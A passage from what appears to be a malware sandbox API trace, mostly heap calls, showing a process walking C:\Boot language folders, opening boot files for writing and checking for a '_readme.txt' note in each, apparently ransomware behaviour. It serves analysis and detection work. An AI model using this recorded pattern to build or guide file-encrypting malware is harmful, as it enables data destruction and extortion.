(HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.033] PathFindFileNameW (pszPath="C:\\Boot\\el-GR\\") returned="el-GR\\" [0093.033] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0093.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.033] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0093.033] PathFindFileNameW (pszPath="") returned="" [0093.033] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0093.033] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0093.033] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0093.034] FreeLibrary (hLibModule=0x75670000) returned 1 [0093.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d1120 | out: hHeap=0x680000) returned 1 [0093.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.034] PathAppendW (in: pszPath="C:\\Boot\\el-GR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 1 [0093.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.034] PathFileExistsW (pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 1 [0093.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.034] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa328e000, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa328e000, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0093.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.034] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa328e000, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa328e000, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.034] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.034] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31758b8 [0093.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.034] PathFindExtensionW (pszPath="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned=".mui" [0093.034] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.034] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31758b8 | out: hHeap=0x680000) returned 1 [0093.034] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa328e000, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa328e000, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa328e000, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0093.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31758b8 [0093.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.035] PathFindExtensionW (pszPath="C:\\Boot\\el-GR\\_readme.txt") returned=".txt" [0093.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31758b8 | out: hHeap=0x680000) returned 1 [0093.035] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa328e000, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa328e000, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa328e000, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0093.035] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0093.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef540 | out: hHeap=0x680000) returned 1 [0093.035] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0093.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef540 [0093.035] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0093.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.035] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.036] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.036] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.036] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f05a0 [0093.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.036] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.036] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.036] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.036] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.036] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.036] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.036] PathFindFileNameW (pszPath="C:\\Boot\\en-US\\") returned="en-US\\" [0093.036] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.036] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0093.036] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0093.036] PathFindFileNameW (pszPath="") returned="" [0093.036] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.036] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0093.037] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0093.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x800) returned 0x31d1120 [0093.037] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0093.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x99ca4f0 [0093.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.037] FreeLibrary (hLibModule=0x75670000) returned 1 [0093.037] PathAppendW (in: pszPath="C:\\Boot\\en-US\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\en-US\\_readme.txt") returned 1 [0093.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.037] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.037] PathFileExistsW (pszPath="C:\\Boot\\en-US\\_readme.txt") returned 1 [0093.037] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.037] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa32b4160, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa32b4160, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0093.037] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.037] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa32b4160, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa32b4160, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.037] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.038] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175990 [0093.038] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.038] PathFindExtensionW (pszPath="C:\\Boot\\en-US\\bootmgr.exe.mui") returned=".mui" [0093.038] CreateFileW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.038] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175990 | out: hHeap=0x680000) returned 1 [0093.038] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0093.038] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.038] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175990 [0093.038] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.038] PathFindExtensionW (pszPath="C:\\Boot\\en-US\\memtest.exe.mui") returned=".mui" [0093.038] CreateFileW (lpFileName="C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.038] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175990 | out: hHeap=0x680000) returned 1 [0093.038] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa32b4160, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa32b4160, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa32b4160, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0093.038] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.038] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175990 [0093.038] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.038] PathFindExtensionW (pszPath="C:\\Boot\\en-US\\_readme.txt") returned=".txt" [0093.038] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175990 | out: hHeap=0x680000) returned 1 [0093.038] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa32b4160, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa32b4160, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa32b4160, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0093.038] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0093.038] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.038] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef540 | out: hHeap=0x680000) returned 1 [0093.038] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0093.038] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef540 [0093.038] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0093.038] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.039] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.039] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.039] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.039] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.039] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.039] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.039] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.039] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.039] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.039] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.039] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.039] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f05a0 [0093.039] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.039] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.039] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.039] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.039] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.039] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.039] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.040] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.040] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.040] RtlAllocateHeap (HeapHandle=0x680000, 